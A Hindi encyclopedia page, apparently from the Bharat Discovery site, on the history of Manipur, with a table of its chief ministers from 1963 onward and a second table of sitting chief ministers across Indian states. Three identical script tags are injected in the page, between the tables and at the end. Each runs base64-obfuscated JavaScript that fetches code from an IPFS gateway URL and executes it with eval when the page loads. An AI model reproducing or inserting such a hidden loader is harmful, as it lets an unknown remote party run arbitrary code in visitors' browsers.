मणिपुर के मुख्यमंत्री

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

मणिपुर भारत का पूर्वी राज्य है। इसकी राजधानी इंफाल है। मणिपुर राज्य के उत्तर और दक्षिण में मिज़ोरम, पश्चिम में असम, और पूर्व में अन्तर्राष्ट्रीय सीमा से म्यांमार लगा हुआ है। मणिपुर का क्षेत्रफल 22,347 वर्ग कि.मी. है। मेइती जनजाति, जो घाटी क्षेत्र में ही रहते हैं, वे ही यहाँ के मूल निवासी हैं। इनकी भाषा मेइतिलोन है। इसी भाषा को मणिपुरी भाषा कहते हैं।

मणिपुर की स्‍वतंत्रता और संप्रभुता 19वीं सदी के आरंभ तक बनी रही। उसके बाद सात वर्ष (1819 से 1825 तक) बर्मी शासकों ने यहाँ पर कब्‍जा करके शासन किया। 1891 में मणिपुर ब्रिटिश शासन के अधीन आ गया और 1947 में देश के साथ स्‍वतंत्र हुआ। 26 जनवरी, 1950 को भारतीय संविधान लागू होने पर यह एक मुख्‍य आयुक्‍त के अधीन भारतीय संघ के भाग ‘सी’ के राज्‍य के रूप में सम्मिलित हुआ। कालांतर में एक प्रादेशिक परिषद का गठन किया गया, जिसमें 30 सदस्य चयन के द्वारा और दो सदस्‍य मनोनीत थे।

इसके पश्चात् 1962 में केंद्रशासित प्रदेश अधिनियम के अधीन 30 सदस्य चयन द्वारा और तीन मनोनीत सदस्यों की विधानसभा स्‍‍थापित की गई। 19 दिसंबर, 1969 से प्रशासक का पद मुख्‍य आयुक्‍त स्थान पर उपराज्‍यपाल कर दिया गया। 21 जनवरी, 1972 को मणिपुर को पूर्ण राज्‍य की श्रेणी मिली और 60 निर्वाचित सदस्‍यों की विधानसभा का गठन किया गया। इस विधानसभा में अनुसूचित जनजाति और अनुसूचित जाति के लिए 19 सीट आरक्षित हैं। मणिपुर से लोकसभा के दो और राज्‍यसभा का एक प्रतिनिधि है। वर्तमान में एन. बीरेन सिंह राज्य के मुख्यमंत्री हैं।

मणिपुर के मुख्यमंत्रियों की सूची
क्रमांक नाम चित्र कार्यकाल दल / पार्टी
1. मैरेम्बम कोइरंग सिंह
Mairembam-Koireng-Singh.jpg
1 जुलाई, 1963 - 11 जनवरी, 1967 भारतीय राष्ट्रीय कांग्रेस
भारत सरकार
राष्ट्रपति शासन (12 जनवरी, 1967 - 19 मार्च, 1967)
(1.) मैरेम्बम कोइरंग सिंह
Mairembam-Koireng-Singh.jpg
20 मार्च, 1967 - 4 अक्टूबर, 1967 भारतीय राष्ट्रीय कांग्रेस
2. लोंगजम थंबो सिंह
Longjam-Thambou-Singh.jpg
13 अक्टूबर, 1967 - 24 अक्टूबर, 1967 मणिपुर यूनाइटेड फ्रंट
भारत सरकार
राष्ट्रपति शासन (25 अक्टूबर, 1967 - 18 फ़रवरी, 1968)
(1.) मैरेम्बम कोइरंग सिंह
Mairembam-Koireng-Singh.jpg
19 फ़रवरी, 1968 - 16 अक्टूबर, 1969 भारतीय राष्ट्रीय कांग्रेस
भारत सरकार
राष्ट्रपति शासन (17 अक्टूबर, 1969 - 22 मार्च, 1972)
3. मोहम्मद अलीमुद्दीन
Mohammed-Alimuddin.jpg
23 मार्च, 1972 - 27 मार्च, 1973 मणिपुर पीपल्स पार्टी
भारत सरकार
राष्ट्रपति शासन (28 मार्च, 1973 - 3 मार्च, 1974)
(3.) मोहम्मद अलीमुद्दीन
Mohammed-Alimuddin.jpg
4 मार्च, 1974 - 9 जुलाई, 1974 मणिपुर पीपल्स पार्टी
4. यांगमाशो शायजा
Yangmaso-Shaiza.jpg
10 जुलाई, 1974 - 5 दिसंबर, 1974 मणिपुर हिल्स यूनियन
5. राज कुमार डोरेन्द्र सिंह
Raj-Kumar-Dorendra-Singh.jpg
6 दिसंबर, 1974 - 15 मई, 1977 भारतीय राष्ट्रीय कांग्रेस
भारत सरकार
राष्ट्रपति शासन (16 मई, 1977 - 28 जून, 1977)
(4.) यांगमाशो शायजा
Yangmaso-Shaiza.jpg
29 जून, 1977 - 13 नवंबर, 1979 जनता पार्टी
भारत सरकार
राष्ट्रपति शासन (14 नवंबर, 1979 - 13 जनवरी, 1980)
(5.) राज कुमार डोरेन्द्र सिंह
Raj-Kumar-Dorendra-Singh.jpg
14 जनवरी, 1980 - 26 नवंबर, 1980 भारतीय राष्ट्रीय कांग्रेस
6. ऋषंग कीशिंग
Rishang-Keishing.jpg
27 नवंबर, 1980 - 27 फ़रवरी, 1981 भारतीय राष्ट्रीय कांग्रेस
भारत सरकार
राष्ट्रपति शासन (28 फ़रवरी, 1981 - 18 जून, 1981)
(6.) ऋषंग कीशिंग
Rishang-Keishing.jpg
19 जून, 1981 - 3 मार्च, 1988 भारतीय राष्ट्रीय कांग्रेस
7. राज कुमार जयचंद्र सिंह
Raj-Kumar-Jaichandra-Singh.jpg
4 मार्च, 1988 - 22 फ़रवरी, 1990 भारतीय राष्ट्रीय कांग्रेस
8. राज कुमार रणबीर सिंह
Blankimage.jpg
23 फ़रवरी, 1990 - 6 जनवरी, 1992 मणिपुर पीपल्स पार्टी
भारत सरकार
राष्ट्रपति शासन (7 जनवरी, 1992 - 7 अप्रैल, 1992)
(5.) राज कुमार डोरेन्द्र सिंह
Raj-Kumar-Dorendra-Singh.jpg
8 अप्रैल, 1992 - 10 अप्रैल, 1993 भारतीय राष्ट्रीय कांग्रेस
भारत सरकार
राष्ट्रपति शासन (31 दिसंबर, 1993 - 13 दिसंबर, 1994)
(6.) ऋषंग कीशिंग
Rishang-Keishing.jpg
14 दिसंबर, 1994 - 15 दिसंबर, 1997 भारतीय राष्ट्रीय कांग्रेस
9. वाहेंगबाम निपाम्चा सिंह
Wahengbam-Nipamacha-Singh.jpg
16 दिसंबर, 1997 - 14 फ़रवरी, 2001 मणिपुर राज्य कांग्रेस पार्टी
10. राधाबिनोद कोइजाम
Radhabinod-Koijam.jpg
15 फ़रवरी, 2001 - 1 जून, 2001 समता पार्टी
भारत सरकार
राष्ट्रपति शासन (2 जून, 2001 - 6 मार्च, 2002)
11. ओकरम इबोबी सिंह
Okram-Ibobi-Singh-1.jpg
7 मार्च, 2002 - 14 मार्च, 2017 (5 वर्ष, 11 दिन) भारतीय राष्ट्रीय कांग्रेस
12. एन. बीरेन सिंह
N.Biren-Singh-1.jpg
15 मार्च, 2017 से पदस्थ भारतीय जनता पार्टी
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
Pema-Khandu.jpg
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
Himanta-Biswa-Sarma.jpg
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
Y-S-Jaganmohan-Reddy.jpg
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
Yogi-Adityanath-1.jpg
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
Pushkar-Singh-Dhami.jpg
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
Naveen-Patnaik.jpg
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
Siddaramaiah.jpg
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
Pinarayi Vijayan.jpg
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
Bhupendra-Patel.jpg
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
Pramod-Sawant.jpg
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
Vishnu-Deo-Sai.jpg
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
Hemant-Soren.JPG
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
M-K-Stalin.jpg
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
Manik-Saha.jpeg
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
Revanth-Reddy.jpg
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
KEJRIWAL.jpg
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
Neiphiu-Rio.jpg
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
Bhagwant-Mann.jpg
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
Mamata Banerjee.jpg
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
N-Rangasamy.jpg
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
Nitish-Kumar-1.jpg
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
N.Biren-Singh-1.jpg
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
Mohan-Yadav.jpg
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
Eknath-Shinde.jpg
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
Lalduhoma.jpg
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
Conrad-Sangma-1.jpg
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
Bhajan-Lal-Sharma.jpg
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
Prem-Singh-Tamang.jpg
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
Nayab-Singh-Saini.jpg
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
Sukhvinder-Singh-Sukhu.jpg
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>